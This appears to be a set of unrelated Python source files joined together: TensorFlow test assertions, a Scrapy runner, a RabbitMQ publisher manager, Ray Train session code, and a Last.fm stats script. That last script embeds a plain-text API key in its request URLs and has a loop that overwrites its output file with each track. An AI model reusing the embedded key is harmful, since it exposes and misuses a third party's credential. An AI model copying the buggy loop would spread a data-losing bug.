# Try to directly compare a, b as ndarrays; if that does not work, then
# traverse through the sequence, which is more expensive.
try:
a_as_ndarray = np.array(a)
b_as_ndarray = np.array(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s." % (path_str,
path_str))
except TypeError as e:
msg = "Error: a%s has %s, but b%s has %s" % (
path_str, type(a), path_str, type(b))
e.args = ((e.args[0] + ' : ' + msg,) + e.args[1:])
raise
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray`, or any arbitrarily nested structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray`, or any arbitrarily nested structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is relaxed to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray, or anything that can be converted to one.
b: the actual numpy ndarray, or anything that can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays have the same values.
Args:
a: the expected numpy ndarray, or anything that can be converted to one.
b: the actual numpy ndarray, or anything that can be converted to one.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b, err_msg=msg)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" % (str(type(e)),
str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal. %s" %
(device1, device2, msg))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer == producer_version
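# A small usage sketch for the two helpers above (hypothetical test code, not
# part of TensorFlow itself); "my_node" and constant_op are placeholders for
# whatever the test actually builds:
#
#   graph = ops.Graph()
#   set_producer_version(graph, producer_version=21)
#   with graph.as_default():
#     constant_op.constant(1.0, name="my_node")
#   node = get_node_def_from_graph("my_node", graph.as_graph_def())
#   assert node is not None and node.name == "my_node"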
|
utilities.py
|
from src.sources import *
from scrapy.crawler import CrawlerRunner
from multiprocessing import Process
from twisted.internet import reactor
def run_spider(spider, source_information):
def f():
runner = CrawlerRunner()
deferred = runner.crawl(spider, source_information=source_information)
deferred.addBoth(lambda _: reactor.stop())
reactor.run()
p = Process(target=f)
p.start()
p.join()
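# Usage sketch (hypothetical): each crawl runs in its own child process because
# Twisted's reactor cannot be restarted within a single process. ExampleSpider
# and the source_information dict below are placeholders, not names exported by
# src.sources.
#
#   if __name__ == "__main__":
#       run_spider(ExampleSpider, {"name": "example", "url": "https://example.com"})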
|
PublisherManager.py
|
from RabbitPublisher import RabbitPublisher
from printer import console_out
import threading
class PublisherManager:
def __init__(self, broker_manager, test_number, actor, publisher_count, in_flight_max, print_mod):
self.broker_manager = broker_manager
self.test_number = test_number
self.publishers = list()
self.publisher_threads = list()
self.actor = actor
self.publisher_count = publisher_count
self.in_flight_max = in_flight_max
self.print_mod = print_mod
def add_sequence_direct_publishers(self, queue_name, count, dup_rate, sequence_count):
for pub_id in range (1, self.publisher_count+1):
publisher = RabbitPublisher(pub_id, self.test_number, self.broker_manager, self.in_flight_max, 120, self.print_mod)
publisher.configure_sequence_direct(queue_name, count, dup_rate, sequence_count)
self.publishers.append(publisher)
def add_large_msgs_direct_publishers(self, queue_name, count, dup_rate, msg_size):
for pub_id in range (1, self.publisher_count+1):
publisher = RabbitPublisher(pub_id, self.test_number, self.broker_manager, self.in_flight_max, 120, self.print_mod)
publisher.configure_large_msgs_direct(queue_name, count, dup_rate, msg_size)
self.publishers.append(publisher)
def add_hello_msgs_direct_publishers(self, queue_name, count, dup_rate):
for pub_id in range (1, self.publisher_count+1):
publisher = RabbitPublisher(pub_id, self.test_number, self.broker_manager, self.in_flight_max, 120, self.print_mod)
publisher.configure_hello_msgs_direct(queue_name, count, dup_rate)
self.publishers.append(publisher)
def add_sequence_to_exchanges_publishers(self, exchanges, routing_key, count, dup_rate, sequence_count):
for pub_id in range (1, self.publisher_count+1):
publisher = RabbitPublisher(pub_id, self.test_number, self.broker_manager, self.in_flight_max, 120, self.print_mod)
publisher.configure_sequence_to_exchanges(exchanges, routing_key, count, dup_rate, sequence_count)
self.publishers.append(publisher)
def add_partitioned_sequence_to_exchanges_publishers(self, exchanges, count, dup_rate, sequence_count):
for pub_id in range (1, self.publisher_count+1):
publisher = RabbitPublisher(pub_id, self.test_number, self.broker_manager, self.in_flight_max, 120, self.print_mod)
publisher.configure_partitioned_sequence_to_exchanges(exchanges, count, dup_rate, sequence_count)
self.publishers.append(publisher)
def add_large_msgs_to_exchanges_publishers(self, exchanges, routing_key, count, dup_rate, msg_size):
for pub_id in range (1, self.publisher_count+1):
publisher = RabbitPublisher(pub_id, self.test_number, self.broker_manager, self.in_flight_max, 120, self.print_mod)
publisher.configure_large_msgs_to_exchanges(exchanges, routing_key, count, dup_rate, msg_size)
self.publishers.append(publisher)
def add_hello_msgs_to_exchanges_publishers(self, exchanges, routing_key, count, dup_rate):
for pub_id in range (1, self.publisher_count+1):
publisher = RabbitPublisher(pub_id, self.test_number, self.broker_manager, self.in_flight_max, 120, self.print_mod)
publisher.configure_hello_msgs_to_exchanges(exchanges, routing_key, count, dup_rate)
self.publishers.append(publisher)
def start_publishers(self):
for prod_id in range(1, len(self.publishers)+1):
pub_thread = threading.Thread(target=self.publishers[prod_id-1].start_publishing)
pub_thread.start()
self.publisher_threads.append(pub_thread)
console_out(f"Publisher {prod_id} started", self.actor)
def stop_all_publishers(self):
for publisher in self.publishers:
publisher.stop_publishing()
for pub_thread in self.publisher_threads:
pub_thread.join(10)
def get_total_msg_set(self):
msgs = set()
for publisher in self.publishers:
msgs = msgs.union(publisher.get_msg_set())
return msgs
def get_total_pos_ack_count(self):
total = 0
for publisher in self.publishers:
total += publisher.get_pos_ack_count()
return total
def get_total_neg_ack_count(self):
total = 0
for publisher in self.publishers:
total += publisher.get_neg_ack_count()
return total
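# Minimal usage sketch (assumed driver code; broker_manager and the queue name
# are placeholders supplied by the surrounding test harness):
#
#   pub_manager = PublisherManager(broker_manager, test_number=1, actor="PUBLISHER",
#                                  publisher_count=2, in_flight_max=100, print_mod=1000)
#   pub_manager.add_sequence_direct_publishers("test-queue", count=10000,
#                                              dup_rate=0, sequence_count=1)
#   pub_manager.start_publishers()
#   # ... run the scenario under test ...
#   pub_manager.stop_all_publishers()
#   console_out(f"Positive acks: {pub_manager.get_total_pos_ack_count()}", "TEST RUNNER")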
|
session.py
|
import os
import platform
import queue
import threading
import time
from datetime import datetime
from dataclasses import dataclass
from enum import Enum, auto
from typing import Callable
from typing import Optional, Dict
import warnings
import ray
from ray.train.constants import (
DETAILED_AUTOFILLED_KEYS, TIME_THIS_ITER_S, PID, TIMESTAMP, TIME_TOTAL_S,
NODE_IP, TRAINING_ITERATION, HOSTNAME, DATE, RESULT_FETCH_TIMEOUT)
from ray.train.utils import PropagatingThread, RayDataset
from ray.util import PublicAPI
class TrainingResultType(Enum):
REPORT = auto()
CHECKPOINT = auto()
@dataclass
class TrainingResult:
type: TrainingResultType
data: Dict
class Session:
"""Holds information for training on each worker."""
def __init__(self,
training_func: Callable,
world_rank: int,
local_rank: int,
world_size: int,
dataset_shard: Optional[RayDataset] = None,
checkpoint: Optional[Dict] = None,
encode_data_fn: Optional[Callable] = None,
detailed_autofilled_metrics: bool = False):
self.dataset_shard = dataset_shard
# The Thread object that is running the training function.
self.training_thread = PropagatingThread(
target=training_func, daemon=True)
self.world_rank = world_rank
self.local_rank = local_rank
self.world_size = world_size
self.loaded_checkpoint = checkpoint
# Function to encode checkpoint dict before sending to the driver.
if not encode_data_fn:
def noop(x):
return x
encode_data_fn = noop
self._encode_data_fn = encode_data_fn
# This lock is used to control the execution of the training thread.
self.continue_lock = threading.Semaphore(0)
# Queue for sending results across threads.
self.result_queue = queue.Queue(1)
# Autofilled metrics attributes.
self.detailed_autofilled_metrics = detailed_autofilled_metrics
self.last_report_time = time.time()
self.iteration = 0
self.time_total = 0.0
self.local_ip = self.get_current_ip()
self.ignore_report = False
self.training_started = False
def get_current_ip(self):
self.local_ip = ray.util.get_node_ip_address()
return self.local_ip
def start(self):
"""Starts the training thread."""
self.training_started = True
self.training_thread.start()
def pause_reporting(self):
"""Ignore all future ``train.report()`` calls."""
self.ignore_report = True
def finish(self):
"""Finishes the training thread.
Either returns the output from training or raises any Exception from
training.
"""
# Wait for training to finish.
# This will raise any errors that occur during training, including
# SystemError
func_output = self.training_thread.join()
# If training finished successfully, then return results.
return func_output
def get_next(self) -> Optional[TrainingResult]:
"""Gets the next ``TrainingResult`` from the result queue.
If the result queue is empty, then this function returns ``None``.
"""
if not self.training_started:
raise RuntimeError("Please call start before calling get_next.")
result = None
# While training is still ongoing, attempt to get the result.
while result is None and self.training_thread.is_alive():
try:
result = self.result_queue.get(
block=True, timeout=RESULT_FETCH_TIMEOUT)
except queue.Empty:
pass
# If no result was found, then the runner must no longer be alive.
if result is None:
# Try one last time to fetch results in case results were
# reported in between the time of the last check and the
# termination of the thread runner.
try:
result = self.result_queue.get(
block=False, timeout=RESULT_FETCH_TIMEOUT)
except queue.Empty:
pass
# Release the lock to trigger training to continue.
self.continue_lock.release()
# Return None if there are no more results to fetch.
return result
def _auto_fill_metrics(self, result: dict) -> dict:
"""Add autofilled metrics and update attributes."""
current_time = time.time()
current_datetime = datetime.now()
if TIME_THIS_ITER_S in result:
time_this_iter = result[TIME_THIS_ITER_S]
else:
time_this_iter = current_time - self.last_report_time
self.iteration += 1
self.time_total += time_this_iter
self.last_report_time = current_time
auto_filled_metrics = {
DATE: current_datetime.strftime("%Y-%m-%d_%H-%M-%S"),
TIMESTAMP: int(time.mktime(current_datetime.timetuple())),
TIME_THIS_ITER_S: time_this_iter,
TIME_TOTAL_S: self.time_total,
PID: os.getpid(),
HOSTNAME: platform.node(),
NODE_IP: self.local_ip,
TRAINING_ITERATION: self.iteration
}
if not self.detailed_autofilled_metrics:
auto_filled_metrics = {
k: v
for k, v in auto_filled_metrics.items()
if k not in DETAILED_AUTOFILLED_KEYS
}
result = result.copy()
result.update(auto_filled_metrics)
return result
def report(self, **kwargs):
"""Adds kwargs to the queue to be consumed by main thread."""
if self.ignore_report:
return
kwargs = self._encode_data_fn(self._auto_fill_metrics(kwargs))
result = TrainingResult(TrainingResultType.REPORT, kwargs)
# Add result to a thread-safe queue.
self.result_queue.put(result, block=True)
# Acquire lock to stop the training thread until main thread
# triggers resume.
self.continue_lock.acquire()
def _auto_fill_checkpoint_metrics(self, result: dict) -> dict:
"""Add autofilled metrics and update attributes."""
current_datetime = datetime.now()
auto_filled_metrics = {
TIMESTAMP: int(time.mktime(current_datetime.timetuple()))
}
result = result.copy()
result.update(auto_filled_metrics)
return result
def checkpoint(self, **kwargs):
"""Adds kwargs to the queue to be consumed by main thread.
Also stores the checkpoint in ``self.loaded_checkpoint``.
"""
# Update session checkpoint to latest checkpoint.
self.loaded_checkpoint = kwargs
# Only store checkpoints on worker with rank 0.
if self.world_rank != 0:
kwargs = {}
else:
kwargs = self._encode_data_fn(
self._auto_fill_checkpoint_metrics(kwargs))
result = TrainingResult(TrainingResultType.CHECKPOINT, kwargs)
# Add result to a thread-safe queue.
self.result_queue.put(result, block=True)
# Acquire lock to stop the training thread until
# checkpoint has been processed.
self.continue_lock.acquire()
_session = None
def init_session(*args, **kwargs) -> None:
global _session
if _session:
raise ValueError("A Train session is already in use. Do not call "
"`init_session()` manually.")
_session = Session(*args, **kwargs)
def get_session() -> Session:
global _session
if _session is None or not isinstance(_session, Session):
raise ValueError("Trying to access a Train session that has not been "
"initialized yet. Train functions like "
"`train.report()` should only be called from inside "
"the training function.")
return _session
def shutdown_session():
"""Shuts down the initialized session."""
global _session
_session = None
@PublicAPI(stability="beta")
def get_dataset_shard(
dataset_name: Optional[str] = None) -> Optional[RayDataset]:
"""Returns the Ray Dataset or DatasetPipeline shard for this worker.
You should call ``to_torch()`` or ``to_tf()`` on this shard to convert
it to the appropriate framework-specific Dataset.
.. code-block:: python
import ray
from ray import train
def train_func():
model = Net()
for iter in range(100):
data_shard = train.get_dataset_shard().to_torch()
model.train(data_shard)
return model
dataset = ray.data.read_csv("train.csv")
dataset.filter(...).repeat().random_shuffle()
trainer = Trainer(backend="torch")
trainer.start()
# Trainer will automatically handle sharding.
train_model = trainer.run(train_func, dataset=dataset)
trainer.shutdown()
Args:
dataset_name (Optional[str]): If a Dictionary of Datasets was passed to
``Trainer``, then specifies which dataset shard to return.
Returns:
The ``Dataset`` or ``DatasetPipeline`` shard to use for this worker.
If no dataset is passed into Trainer, then return None.
"""
session = get_session()
shard = session.dataset_shard
if shard is None:
warnings.warn("No dataset passed in. Returning None. Make sure to "
"pass in a Ray Dataset to Trainer.run to use this "
"function.")
elif isinstance(shard, dict):
if not dataset_name:
raise RuntimeError(
"Multiple datasets were passed into ``Trainer``, "
"but no ``dataset_name`` is passed into "
"``get_dataset_shard``. Please specify which "
"dataset shard to retrieve.")
return shard[dataset_name]
return shard
@PublicAPI(stability="beta")
def report(**kwargs) -> None:
"""Reports all keyword arguments to Train as intermediate results.
.. code-block:: python
import time
from ray import train
def train_func():
for iter in range(100):
time.sleep(1)
train.report(hello="world")
trainer = Trainer(backend="torch")
trainer.start()
trainer.run(train_func)
trainer.shutdown()
Args:
**kwargs: Any key value pair to be reported by Train.
If callbacks are provided, they are executed on these
intermediate results.
"""
session = get_session()
session.report(**kwargs)
@PublicAPI(stability="beta")
def world_rank() -> int:
"""Get the world rank of this worker.
.. code-block:: python
import time
from ray import train
def train_func():
for iter in range(100):
time.sleep(1)
if train.world_rank() == 0:
print("Worker 0")
trainer = Trainer(backend="torch")
trainer.start()
trainer.run(train_func)
trainer.shutdown()
"""
session = get_session()
return session.world_rank
@PublicAPI(stability="beta")
def local_rank() -> int:
"""Get the local rank of this worker (rank of the worker on its node).
.. code-block:: python
import time
from ray import train
def train_func():
if torch.cuda.is_available():
torch.cuda.set_device(train.local_rank())
...
trainer = Trainer(backend="torch", use_gpu=True)
trainer.start()
trainer.run(train_func)
trainer.shutdown()
"""
session = get_session()
return session.local_rank
@PublicAPI(stability="beta")
def load_checkpoint() -> Optional[Dict]:
"""Loads checkpoint data onto the worker.
.. code-block:: python
from ray import train
def train_func():
checkpoint = train.load_checkpoint()
for iter in range(checkpoint["epoch"], 5):
print(iter)
trainer = Trainer(backend="torch")
trainer.start()
trainer.run(train_func, checkpoint={"epoch": 3})
# 3
# 4
trainer.shutdown()
Returns:
The most recently saved checkpoint if ``train.save_checkpoint()``
has been called. Otherwise, the checkpoint that the session was
originally initialized with. ``None`` if neither exist.
"""
session = get_session()
return session.loaded_checkpoint
@PublicAPI(stability="beta")
def save_checkpoint(**kwargs) -> None:
"""Checkpoints all keyword arguments to Train as restorable state.
.. code-block:: python
import time
from ray import train
def train_func():
for iter in range(100):
time.sleep(1)
train.save_checkpoint(epoch=iter)
trainer = Trainer(backend="torch")
trainer.start()
trainer.run(train_func)
trainer.shutdown()
Args:
**kwargs: Any key value pair to be checkpointed by Train.
"""
session = get_session()
session.checkpoint(**kwargs)
@PublicAPI(stability="beta")
def world_size() -> int:
"""Get the current world size (i.e. total number of workers) for this run.
.. code-block:: python
import time
from ray import train
def train_func():
assert train.world_size() == 4
trainer = Trainer(backend="torch", num_workers=4)
trainer.start()
trainer.run(train_func)
trainer.shutdown()
"""
session = get_session()
return session.world_size
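# How the pieces above fit together on a worker: the backend creates the
# session, starts the training thread, and drains results until the thread
# exits. A simplified sketch of that driver loop (not Ray's actual backend
# code; my_train_func and handle() are placeholders):
#
#   init_session(training_func=my_train_func, world_rank=0, local_rank=0, world_size=1)
#   session = get_session()
#   session.start()
#   while True:
#       result = session.get_next()   # blocks until report()/checkpoint() or thread exit
#       if result is None:
#           break
#       handle(result)                # e.g. invoke callbacks, persist checkpoints
#   output = session.finish()
#   shutdown_session()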
|
lasthopold.py
|
import os
import json
import math
import urllib.request, urllib.error, urllib.parse
import requests
import multiprocessing
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
from shared.set_username import SetUsername
from shared.config import Config
def go():
LastHop.run()
class LastHop:
def __init__(self, username, real_name, join_date, total_tracks):
self.timezone_diff = self.get_timezone_diff()
self.join_date = join_date.date()
self.stats_date = datetime.today()
self.username = username
self.real_name = real_name if real_name else self.username
self.total_tracks = int(total_tracks)
self.avg_daily_tracks = (
self.total_tracks / (self.stats_date.date() - self.join_date).days
)
self.user_profile = "https://www.last.fm/user/{user}/library".format(
user=username
)
self.file_path = os.path.dirname(
os.path.realpath(__file__)
) + "/users/{username}".format(username=username)
if not os.path.exists(self.file_path):
os.makedirs(self.file_path)
@staticmethod
def get_timezone_diff():
"""
Get difference in hours from UTC timezone. Daylight savings makes this variable.
:return: Timezone diff in hours
"""
return datetime.now().hour - datetime.utcnow().hour
def get_date_filename(self, date):
"""
Get file name for given day
"""
if isinstance(date, datetime):
date = date.date()
print(type(date))
# print( "{path}/{date}.csv".format(path=self.file_path, date=date))
return "{path}/{date}.csv".format(path=self.file_path, date=date)
def user_stats(self):
print(
"{user} has been on Last.fm for {years} years "
"\nThey've played {total_tracks} tracks \n"
"That's an average of {avg} track{s} per day.".format(
user=self.real_name,
years=(self.stats_date.year - self.join_date.year),
total_tracks="{:,}".format(self.total_tracks),
avg=int(self.avg_daily_tracks),
s="s" if self.avg_daily_tracks > 1 else "",
)
)
def music_stats(self):
print(
"- - - - - - - - - - - - - {date} - - - - - - - - - - - - - -".format(
date=self.stats_date.date().strftime("%B %-d")
)
)
print("- - - - - - - - - - Most Played Artists - - - - - - - - - -")
self.yearly_most_played_artists()
print("\n- - - - - - - - - Played around this time - - - - - - - - -")
# self.yearly_around_this_time()
print("\n- - - - - - - - - - - All Artists - - - - - - - - - - - - -")
# self.yearly_all_artists()
print("- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -")
# if self.stats_date.date() == datetime.today().date() and datetime.today().time().hour < 2:
# try:
# day_file_path = self.get_date_filename(self.stats_date.date())
# os.remove(day_file_path)
# except OSError:
# pass
def process_day(self, date):
"""
Fetches the tracks played on the given date via the Last.fm API and writes
them to this user's day file.
:param date: Date to process and write files for
"""
today_file_path = self.get_date_filename(date.date())
print(today_file_path)
tracks_and_dates_list = []
page = 1
date_start = (
date.replace(hour=0)
.replace(minute=0)
.replace(second=0)
.replace(microsecond=0)
)
date_start_epoch = int(date_start.timestamp())
date_end_epoch = int(
date_start.replace(hour=23)
.replace(minute=59)
.replace(second=59)
.timestamp()
)
api_url = (
f"http://ws.audioscrobbler.com/2.0/?method=user.getrecenttracks"
f"&user={self.username}&"
f"api_key=8257fbe241e266367f27e30b0e866aba&"
f"&from={date_start_epoch}"
f"&to={date_end_epoch}"
f"&limit=200"
f"&page=1"
f"&format=json"
)
response = requests.get(api_url).json()
recenttracks = response.get("recenttracks", {}).get("track")
total_track_count = response.get("recenttracks", {}).get("total", 0)
# if total_track_count == 0:
# today_file = open(today_file_path, 'w+')
# today_file.write("0")
# today_file.close()
# return []
num_pages = math.ceil(total_track_count / 200)
tracks_and_dates = []
artist_track_date_map = {}
if num_pages > 1:
for page_num in range(2, num_pages + 1):
api_url = (
f"http://ws.audioscrobbler.com/2.0/?method=user.getrecenttracks"
f"&user={self.username}&"
f"api_key=8257fbe241e266367f27e30b0e866aba&"
f"&from={date_start_epoch}"
f"&to={date_end_epoch}"
f"&limit=200"
f"&page={page_num}"
f"&format=json"
)
response = requests.get(api_url).json()
recenttracks.extend(response.get("recenttracks", {}).get("track"))
for track in recenttracks:
artist = track.get("artist", {}).get("#text").replace(",", "")
title = track.get("name").replace(",", "")
play_date = track.get("date", {}).get("#text", datetime.now())
play_date_datetime = datetime.strptime(play_date, "%d %b %Y, %H:%M")
play_date_formatted = play_date_datetime.strftime("%Y/%m/%d %H:%M:%S")
with open(today_file_path, "w+") as stats_file:
stats_file.write(f"{artist},{title},{play_date_formatted}")
# today_file = open(today_file_path, 'w+')
# for key in artist_dict:
# today_file.write("{track}: {date}\n".format(track=key, date=artist_dict.get(key)))
# today_file.close()
# if artist_track_date_map.get()
# tracks_and_dates.append(f"{artist} - {title}: m[{play_date}]")
# print(tracks_and_dates)
#
# if artist_dict.get(tracks_and_dates[i]):
# date_list = artist_dict.get(tracks_and_dates[i])
# date_list.append(tracks_and_dates[i + 1])
# artist_dict[tracks_and_dates[i]] = date_list
# else:
# artist_dict[tracks_and_dates[i]] = [tracks_and_dates[i + 1]]
# tracks_and_dates_list.append({"track": tracks_and_dates[i], "date": tracks_and_dates[i + 1]})
# while True: # paging
# response = requests.get(api_url).json()
# if response.get("recenttracks", {}).get("total", 0) < 1:
# break
#
#
# url = '{user_profile}?rangetype=1day&from={date}&page={page}'.format(user_profile=self.user_profile,
# date=date,
# page=str(page))
# artist_dict = {}
# tracks_and_dates = []
# while True: # paging
# response = requests.get(url)
# if response.url != url:
# break
#
# if "didn't scrobble anything" in response.content:
# today_file = open(today_file_path, 'w+')
# today_file.write("0")
# today_file.close()
# return []
# lines = response.content.split('title="')[1:]
# tracks_and_dates = []
# for line in lines:
# l = line.split('">')[0].split("\n")[0]
# if l[0] is not " ":
# tracks_and_dates.append(l.replace('"', '').replace('&', '&'))
# for i in range(0, len(tracks_and_dates)):
# if '\xe2\x80\x94' in tracks_and_dates[i]:
# if (datetime.strptime(tracks_and_dates[i + 1], '%A %d %b %Y, %I:%M%p').time().hour > 21 and
# self.stats_date.date().day == date.day):
# continue
# else:
# if artist_dict.get(tracks_and_dates[i]):
# date_list = artist_dict.get(tracks_and_dates[i])
# date_list.append(tracks_and_dates[i + 1])
# artist_dict[tracks_and_dates[i]] = date_list
# else:
# artist_dict[tracks_and_dates[i]] = [tracks_and_dates[i + 1]]
# tracks_and_dates_list.append({"track": tracks_and_dates[i], "date": tracks_and_dates[i + 1]})
# page += 1
# url = '{user_profile}?rangetype=1day&from={date}&page={page}'.format(user_profile=self.user_profile,
# date=date,
# page=str(page))
# today_file = open(today_file_path, 'w+')
# for key in artist_dict:
# today_file.write("{track}: {date}\n".format(track=key, date=artist_dict.get(key)))
# today_file.close()
# return artist_dict
def write_day_file(self, date):
"""
Writes track data for one day
:param date:
:return:
"""
day_file_path = self.get_date_filename(date.date())
